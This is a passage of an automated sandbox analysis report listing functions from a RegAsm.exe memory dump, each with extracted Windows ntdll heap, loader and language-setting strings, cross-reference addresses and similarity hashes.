Download Yara Rule

Strings

AppContainerNamedObjects, xrefs: 02D1946E, 02D194D6
\BaseNamedObjects, xrefs: 02D1949E
\Sessions, xrefs: 02D19488
\AppContainerNamedObjects, xrefs: 02D194AB, 02D194B9
Global\Session\%ld%s, xrefs: 02D194C5
BaseNamedObjects, xrefs: 02D19477, 02D1947C
%s\%u-%u-%u-%u, xrefs: 02D19422
%s\%ld\%s, xrefs: 02D1948D

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: a969074b92eaaebcc11b5fb06b2e04adf8eecf890ad2ebd6f541dcb8d720d495
Instruction ID: 2615d6e14360e2a5790fa04549d8f3aafdcc5918518442f8d413ca381660b2d8
Opcode Fuzzy Hash: a969074b92eaaebcc11b5fb06b2e04adf8eecf890ad2ebd6f541dcb8d720d495
Instruction Fuzzy Hash: 1FD127B2804791BFD721DA54D861BABB7E8AF84B58F04092DFA84A7350D770CD44CBE2

Function 02D30274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 02D3069F
About to reallocate block at %p to %Ix bytes, xrefs: 02D303BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 02D304D3
Just reallocated block at %p to %Ix bytes, xrefs: 02D305F1
RtlReAllocateHeap, xrefs: 02D302BF, 02D30362
HEAP: , xrefs: 02D303A6, 02D304B5, 02D305DD, 02D30682, 02D306D9
HEAP[%wZ]: , xrefs: 02D30399, 02D304A8, 02D305D0, 02D30675, 02D306CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 02D306EA

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: cc44f1514c96c8c04fe5f77a5348a6d5aa188e149759f562ac27cbd6cf889e5f
Instruction ID: a515ef8dae9b64d3685ca8faeb454ea04e1905773f0d420b6e0300d75f561317
Opcode Fuzzy Hash: cc44f1514c96c8c04fe5f77a5348a6d5aa188e149759f562ac27cbd6cf889e5f
Instruction Fuzzy Hash: 9AD1CB32A00685EFDB12DF68C840AA9BBF2FF49719F088059E8869B352D734DD84DF54

Function 02C7D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 02C7D0FD
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02C7D2C3
@, xrefs: 02C7D2AF
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02C7D146
@, xrefs: 02C7D313
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02C7D262
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02C7D0CF
Control Panel\Desktop\LanguageConfiguration, xrefs: 02C7D196

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: b173d2884d5a402f1190853c63d2abd8020d9a6366e4fdb30db4231963035078
Instruction ID: b4b97e6decb3dfe05820508ce9bdf3740fe1f91f1d60dde72a2477d01dc01529
Opcode Fuzzy Hash: b173d2884d5a402f1190853c63d2abd8020d9a6366e4fdb30db4231963035078
Instruction Fuzzy Hash: 93A19D719083459FD721DF25C884B5BB7E8BF88729F00492EFA8996240D774DA49CF93

Function 02C7F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(!TrailingUCR), xrefs: 02CDE3A9
(UCRBlock != NULL), xrefs: 02CDDF6F
HEAP: , xrefs: 02CDDF64, 02CDE0A8, 02CDE286, 02CDE39E
(LONG)FreeEntry->Size > 1, xrefs: 02CDE291
HEAP[%wZ]: , xrefs: 02CDDF57, 02CDE09B, 02CDE279, 02CDE391
((LONG)FreeEntry->Size > 1), xrefs: 02CDE0B3

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 69b65ffae69f75c77568c9d2660edddaafb41e091c01709c5602dee00c4fbab0
Instruction ID: e7bfc360dbbe1ebd57315ce501cc77df6a5cf305daff2d637371cc277c0003ca
Opcode Fuzzy Hash: 69b65ffae69f75c77568c9d2660edddaafb41e091c01709c5602dee00c4fbab0
Instruction Fuzzy Hash: E6420E31608781DFD715DF29C884B2ABBE6FF88308F08496DE8968B751D734E945CB92

Function 02C9B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

LdrpPreprocessDllName, xrefs: 02CE8403, 02CE84D7
minkernel\ntdll\ldrutil.c, xrefs: 02CE840D, 02CE84E1
DLL %wZ was redirected to %wZ by %s, xrefs: 02CE83FC
API set, xrefs: 02CE83F4, 02CE83F9
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 02CE84D0
SxS, xrefs: 02CE83ED

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 3e89a1c846e16b62853b215a859fc179aa62e08b45d20ad14f2d3fa94334f6b1
Instruction ID: 5a8ca777c994853defd9ba2aae6f56e394b5b9c866cbb4a36e045e45ba92217b
Opcode Fuzzy Hash: 3e89a1c846e16b62853b215a859fc179aa62e08b45d20ad14f2d3fa94334f6b1
Instruction Fuzzy Hash: 74C15A31A00215BBDF24CF65D898B7EB766FF85708F1441A9EC06AB290EB74CE84D791

Function 02CB63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 02CF4258
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 02CF41FE
_LdrpInitialize, xrefs: 02CF40DF, 02CF4141, 02CF4205, 02CF425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 02CF40D8
Process initialization failed with status 0x%08lx, xrefs: 02CF413A
minkernel\ntdll\ldrinit.c, xrefs: 02CF40E9, 02CF414B, 02CF420F, 02CF4269

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 2b837a0a825be191d28885fee0ab9b4681834d308d61d5bcc3e34f36b9292aac
Instruction ID: 45b97c445fb23580c565e842f56349de0705302148aedd00d2fb186da11b0567
Opcode Fuzzy Hash: 2b837a0a825be191d28885fee0ab9b4681834d308d61d5bcc3e34f36b9292aac
Instruction Fuzzy Hash: 0D915930E417109BEBB9DF14D848BAA77A9AF80728F240179EB016B780E7789D45DFD1

Function 02CAD7B0 Relevance: 7.7, Strings: 6, Instructions: 151COMMON

Download Yara Rule

Strings

LdrShutdownProcess, xrefs: 02CEF2CE
0,, xrefs: 02CAD846
$, xrefs: 02CAD900
$, xrefs: 02CAD86D
Process 0x%p (%wZ) exiting, xrefs: 02CEF2C7
minkernel\ntdll\ldrinit.c, xrefs: 02CEF2D8

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: $$$$0,$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-3106340194
Opcode ID: cf9e766aeca901500daedff1fc7514437269f19f13721d513dc6c7a9cc56ec4e
Instruction ID: c3f27d251215137b84f7d35ff893c66052ebe3d86fa5e428bb9fa222a5fd148c
Opcode Fuzzy Hash: cf9e766aeca901500daedff1fc7514437269f19f13721d513dc6c7a9cc56ec4e
Instruction Fuzzy Hash: 7851ED71E003469FDB14DFA4D4A47ADBBB2BF88708F144059D8126BA80E778E994CFC0

Function 02CBC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Loading import redirection DLL: '%wZ', xrefs: 02CF8170
Unable to build import redirection Table, Status = 0x%x, xrefs: 02CF81E5
minkernel\ntdll\ldrredirect.c, xrefs: 02CF8181, 02CF81F5
LdrpInitializeImportRedirection, xrefs: 02CF8177, 02CF81EB
LdrpInitializeProcess, xrefs: 02CBC6C4
minkernel\ntdll\ldrinit.c, xrefs: 02CBC6C3

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: ddf635b872879e736f9677e02cd9983f1c18865baa178f58b56b4958b7a3ddc2
Instruction ID: 052767424093edd5821824196f860934e96283fbcbac6b694c7084dc1e4263ba
Opcode Fuzzy Hash: ddf635b872879e736f9677e02cd9983f1c18865baa178f58b56b4958b7a3ddc2
Instruction Fuzzy Hash: A33137717843519FD310EF28DC86E2A7795EFC0B14F040668F945AB390E720ED04DBA2

Function 02CB2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02CF21BF
SXS: %s() passed the empty activation context, xrefs: 02CF2165
RtlGetAssemblyStorageRoot, xrefs: 02CF2160, 02CF219A, 02CF21BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02CF219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02CF2178
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02CF2180

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: feb9d0081438b1b631513dbee586470161edee1d72417e1be4edd953f175a82d
Instruction ID: bc6395558ad2ba4be194322dae3ad51bb8de87e85a0aa52d9034694eba49cfc0
Opcode Fuzzy Hash: feb9d0081438b1b631513dbee586470161edee1d72417e1be4edd953f175a82d
Instruction Fuzzy Hash: 41310732F402147BF7228A95CC89FABB779DF99A44F058069FF05B7240D6709E01C6A6

Function 02CA51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

WindowsExcludedProcs, xrefs: 02CA522A
Kernel-MUI-Language-SKU, xrefs: 02CA542B
Kernel-MUI-Language-Allowed, xrefs: 02CA527B
Kernel-MUI-Language-Disallowed, xrefs: 02CA5352
Kernel-MUI-Number-Allowed, xrefs: 02CA5247

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 62016c9b5078f693a76d2954fdc432cf339877075257284c2a50405d1a02c239
Instruction ID: 0ec304238ab78b78823b0f1dddc088574c515099eeae807efc12e81de8f5c645
Opcode Fuzzy Hash: 62016c9b5078f693a76d2954fdc432cf339877075257284c2a50405d1a02c239
Instruction Fuzzy Hash: 28F16972D10629EFCF15DFA8C890AAEBBB9BF48798F51416AE405E7210D7709E01DF90

Function 02C776B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02CDB023
, passed to %s, xrefs: 02CDB040
Invalid heap signature for heap at %p, xrefs: 02CDB02F
RtlFreeHeap, xrefs: 02CDB03F
HEAP[%wZ]: , xrefs: 02CDB016

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: c7f2c5fcad58cc6b8d547da051aa60b706016bd40597da70affdddb7bcf87217
Instruction ID: cee81c848e901c39997b01656c96438ddacb9e7587d740057bddc04cc7325013
Opcode Fuzzy Hash: c7f2c5fcad58cc6b8d547da051aa60b706016bd40597da70affdddb7bcf87217
Instruction Fuzzy Hash: 56017032145250DFF32A9338F809F52BBF8EB82B78F254059E41547650DBA4ECC8C6A4

Function 02C970C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02C97C96, 02C98696
HEAP: , xrefs: 02C97C7C, 02C9867F
HEAP[%wZ]: , xrefs: 02C97C6D, 02C98670

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 09b6dbd5ecba4fe6e825e2665f19a932ca5384e4baef38c14c44a8558fb33b8f
Instruction ID: a1984571bbccde657e5f723ed2e248a92eba0ec71991afb7ee442c6d97383108
Opcode Fuzzy Hash: 09b6dbd5ecba4fe6e825e2665f19a932ca5384e4baef38c14c44a8558fb33b8f
Instruction Fuzzy Hash: E8139EB0A01655CFDF25CF69C8987A9FBB1FF89304F1482A9D849AB381D734A945CF90

Function 02C91070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

@, xrefs: 02CE5A53
HEAP: , xrefs: 02CE5884
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 02CE588F
HEAP[%wZ]: , xrefs: 02CE5877

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: ca552f76e3c5e344954074a2f065e682eb151d9916f4bb7f1ca7cfe213573aa8
Instruction ID: 290f6302571e7e654d9b2aba08f129edaf3e73308433b4594732902e62eb44ab
Opcode Fuzzy Hash: ca552f76e3c5e344954074a2f065e682eb151d9916f4bb7f1ca7cfe213573aa8
Instruction Fuzzy Hash: FF924871A01269CFEF24CB19C845BA9B7B6BF84354F1981EAD94EA7340D7709E80CF51

Function 02C8A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Enter, xrefs: 02C8A3EF
6, xrefs: 02C8A3F7
8, xrefs: 02C8A3E7
LdrResFallbackLangList Exit, xrefs: 02C8A3FF

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 3af83662f9ef2ba123b8d6651335345d201f3bfda5c18c565f50037ee6e2044f
Instruction ID: 92723dd72520e3389b7b8279184178285010f66b2841b6f0cecdf75d16d16979
Opcode Fuzzy Hash: 3af83662f9ef2ba123b8d6651335345d201f3bfda5c18c565f50037ee6e2044f
Instruction Fuzzy Hash: 7CC18D75108782CFDB11EF19C444B6AB7E4FF84708F00896AF9968B250E738DA89CB52

Function 02CB273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 02CF21DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02CF22B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02CF21D9, 02CF22B1
.Local, xrefs: 02CB28D8

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 6f79ff60e2b5ac8a83412e2210308b8b33fd3eeaa2823499f1d9f28af7617c53
Instruction ID: 7e8ada4a9cdb0e03859c0cad358017d94ed510f03dd8fa21e0077ef7ddfcc018
Opcode Fuzzy Hash: 6f79ff60e2b5ac8a83412e2210308b8b33fd3eeaa2823499f1d9f28af7617c53
Instruction Fuzzy Hash: EEA19C31D402299BDB65CF65CC88BE9B3B5BF98318F1541EADD08AB251D7309E81CF92

Function 02C7F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 02CDE563
`, xrefs: 02CDE428
HEAP: , xrefs: 02CDE54E
HEAP[%wZ]: , xrefs: 02CDE3FE

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: c6da6b4fae82ea5144bcf979b20c8e01fa09aa837fd14bd70ce1853616d21f2c
Instruction ID: 9f44f599b2a2a3ad0dfdf482b10b814a35fc0c44356b76a3233996483a357152
Opcode Fuzzy Hash: c6da6b4fae82ea5144bcf979b20c8e01fa09aa837fd14bd70ce1853616d21f2c
Instruction Fuzzy Hash: 43610432204780AFE722DB68C888F6B77E9FF84754F140469FA558B691D734E941CB62

Function 02D311A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02D3124A, 02D3125D, 02D3125F, 02D312C4
This is located in the %s field of the heap header., xrefs: 02D312D6
HEAP[%wZ]: , xrefs: 02D3123D, 02D312B7
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 02D31261

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 8dc5340431a12f0120241201d21e4f011a01efe87a181316299b72b00d29528f
Instruction ID: 9455045fa77d1f38d21947721df74e904a363df7fcaf758b6238ab4026097238
Opcode Fuzzy Hash: 8dc5340431a12f0120241201d21e4f011a01efe87a181316299b72b00d29528f
Instruction Fuzzy Hash: 1031FD35200521EFE712DBA8C886F6673E9FB04768F198165E85ACB390E771EC80DE65

Function 02C79148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

VirtualQuery Failed 0x%p %x, xrefs: 02CDBAF7
VirtualProtect Failed 0x%p %x, xrefs: 02CDBABA
HEAP: , xrefs: 02CDBAAD, 02CDBAEA
HEAP[%wZ]: , xrefs: 02CDBAA0, 02CDBADD

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 03faa8f3cdaf918e44693a0b09d9c685f7a2b9021692880ca27812dadfc0843b
Instruction ID: 82136f44f9833154f6d6f3c356fdc7dc2c5c03f822cbbec07fa78137d2114eb0
Opcode Fuzzy Hash: 03faa8f3cdaf918e44693a0b09d9c685f7a2b9021692880ca27812dadfc0843b
Instruction Fuzzy Hash: B431E432640114EFDB01DB55CC89FAAB7F9EF45B68F154065F919AB290D770ED80CB60

Function 02C90770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 02CE50BD
HEAP[%wZ]: , xrefs: 02CE50AE
(UCRBlock->Size >= *Size), xrefs: 02CE50CA

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 4ef52d09a295faad63fce737db01e122dafed40070a2e680089268b5aede4a44
Instruction ID: 9f600e72aed7ffddeab173a7809239787e01d0c315f22400f8b28ed60a01e13c
Opcode Fuzzy Hash: 4ef52d09a295faad63fce737db01e122dafed40070a2e680089268b5aede4a44
Instruction Fuzzy Hash: D2F19970B00605DFEF15CF69C898B6AB7B6FF84708F1481A9E4169B391D734EA81CB90

Function 02C8B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 02C8B702
LdrResGetRCConfig Exit, xrefs: 02C8B714
MUI, xrefs: 02C8B6D8, 02C8B7E7

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 66fc8fd689b219c7504cd9e6c190d921d39c8fec3447c5111d41822f855433f3
Instruction ID: ac524d2d257293141c882c60f0038ebfa027d65b6d729fdb0627e92d79b88d3f
Opcode Fuzzy Hash: 66fc8fd689b219c7504cd9e6c190d921d39c8fec3447c5111d41822f855433f3
Instruction Fuzzy Hash: 5AB18E31A047959BCF25DF59C980BAEB7B6AF8431CF15856AE866EB380D730ED40CB50

Function 02D0368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 02D03842
@, xrefs: 02D0389F
DelegatedNtdll, xrefs: 02D036CE

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: e658ae467b2564a3815644e481b65f5c049a48d510a486fbb54c921f616dfc21
Instruction ID: 1b4db4f16080af100da8e7a00ab14f8415bdb05bcaa5d829338509f1beee7602
Opcode Fuzzy Hash: e658ae467b2564a3815644e481b65f5c049a48d510a486fbb54c921f616dfc21
Instruction Fuzzy Hash: 5CB1BDB2A08741AFE361DE55C8C0F6BB7E8EB44714F104969FA409B3A0E774EC44CB92

Function 02C7A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 02C7A1C1
\??\, xrefs: 02CDC1E4
FilterFullPath, xrefs: 02CDC2E6

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 2b85e1afc978a4a8c0608290ccc2446db52e658b7173187eba413edf472b4309
Instruction ID: bc3ab02e0c507268d030efd0400fb636289645bf52c9088fae7080c26a747913
Opcode Fuzzy Hash: 2b85e1afc978a4a8c0608290ccc2446db52e658b7173187eba413edf472b4309
Instruction Fuzzy Hash: 79A177719006299BDB219F64CC88BEAB7B8EF44714F1041EAEA0DA7250DB35AF85CF54

Function 02D136EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

LdrpResMapFile Exit, xrefs: 02D13727
@, xrefs: 02D13867
LdrpResMapFile Enter, xrefs: 02D13715

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

API ID:
String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
API String ID: 0-318774311
Opcode ID: a4fb57a5485fe34a6b6ca0ada84657731be8458147956c9476096e858c5bb561
Instruction ID: 5108f96655b1225c584e10569d8c75fdde97337a2d3eeacf39eb28af8ce7ae08
Opcode Fuzzy Hash: a4fb57a5485fe34a6b6ca0ada84657731be8458147956c9476096e858c5bb561
Instruction Fuzzy Hash: C781ABB1608380AFE751DB14D884B6ABBE9EF84754F0409ADFD849B790DB74DD04CBA2

Function 02CB909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

&, xrefs: 02CF5CF8
@, xrefs: 02CB9148
%, xrefs: 02CF5D3F

Memory Dump Source

Source File: 00000003.00000002.2557422271.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2c50000_RegAsm.jbxd

Similarity

